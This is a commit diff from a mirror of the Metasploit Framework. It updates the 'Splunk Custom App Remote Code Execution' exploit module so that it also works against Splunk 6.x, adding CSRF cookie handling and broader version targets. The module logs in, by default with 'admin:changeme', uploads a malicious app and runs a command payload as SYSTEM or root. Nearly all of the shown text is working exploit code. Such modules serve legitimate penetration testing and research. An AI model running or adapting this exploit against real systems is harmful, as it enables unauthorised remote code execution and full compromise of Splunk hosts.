infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge #3507 into local, recently updated branch of master for landing

bug/bundler_fix
Jon Hart 2014-10-30 17:28:20 -07:00
parent cc7f7c9986 755dec1629
commit 55f245f20f
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 24 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
modules/exploits/multi/http/splunk_upload_app_exec.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Splunk 5.0 Custom App Remote Code Execution',
'Name' => 'Splunk Custom App Remote Code Execution',
'Description' => %q{
This module exploits a feature of Splunk whereby a custom application can be
uploaded through the web based interface. Through the 'script' search command a
@ -20,14 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
perl or python code. To abuse this behavior, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk. Note that the Splunk web interface
runs as SYSTEM on Windows, or as root on Linux by default. This module has only
been tested successfully against Splunk 5.0.
runs as SYSTEM on Windows, or as root on Linux by default. This module has been
tested successfully against Splunk 5.0, 6.1, and 6.1.1.
},
'Author' =>
[
"marcwickenden", # discovery and metasploit module
"sinn3r", # metasploit module
"juan vazquez" # metasploit module
"juan vazquez", # metasploit module
"Gary Blosser" # metasploit module updates for Splunk 6.1
],
'License' => MSF_LICENSE,
'References' =>
@ -44,13 +45,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => %w{ linux unix win },
'Targets' =>
[
[ 'Splunk 5.0.1 / Linux',
[ 'Splunk >= 5.0.1 / Linux',
{
'Arch' => ARCH_CMD,
'Platform' => %w{ linux unix }
}
],
[ 'Splunk 5.0.1 / Windows',
[ 'Splunk >= 5.0.1 / Windows',
{
'Arch' => ARCH_CMD,
'Platform' => 'win'
@ -96,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
# set up some variables for later use
@auth_cookies = ''
@csrf_form_key = ''
@csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
app_name = 'upload_app_exec'
p = payload.encoded
print_status("Using command: #{p}")
@ -121,11 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
{
'uri' => '/en-US/api/search/jobs',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
'headers' =>
{
'X-Requested-With' => 'XMLHttpRequest',
'X-Splunk-Form-Key' => @csrf_form_key
'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified)
},
'vars_post' =>
{
@ -274,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'uri' => '/en-US/manager/appinstall/_upload',
'method' => 'POST',
'cookie' => @auth_cookies,
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data
}, 30)
@ -294,8 +296,20 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET',
'cookie' => @auth_cookies
})
res.body.match(/FORM_KEY":\ "(\d+)"/)
res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
@csrf_form_key = $1
unless @csrf_form_key # Version 6
res.get_cookies.split(';').each {|c|
c.split(',').each {|v|
if v.split('=')[0] =~ /splunkweb_csrf_token/ #regex as the full name is something like splunkweb_csrf_token_8000
@csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
@csrf_form_key = v.split('=')[1]
end
}
}
end
fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
end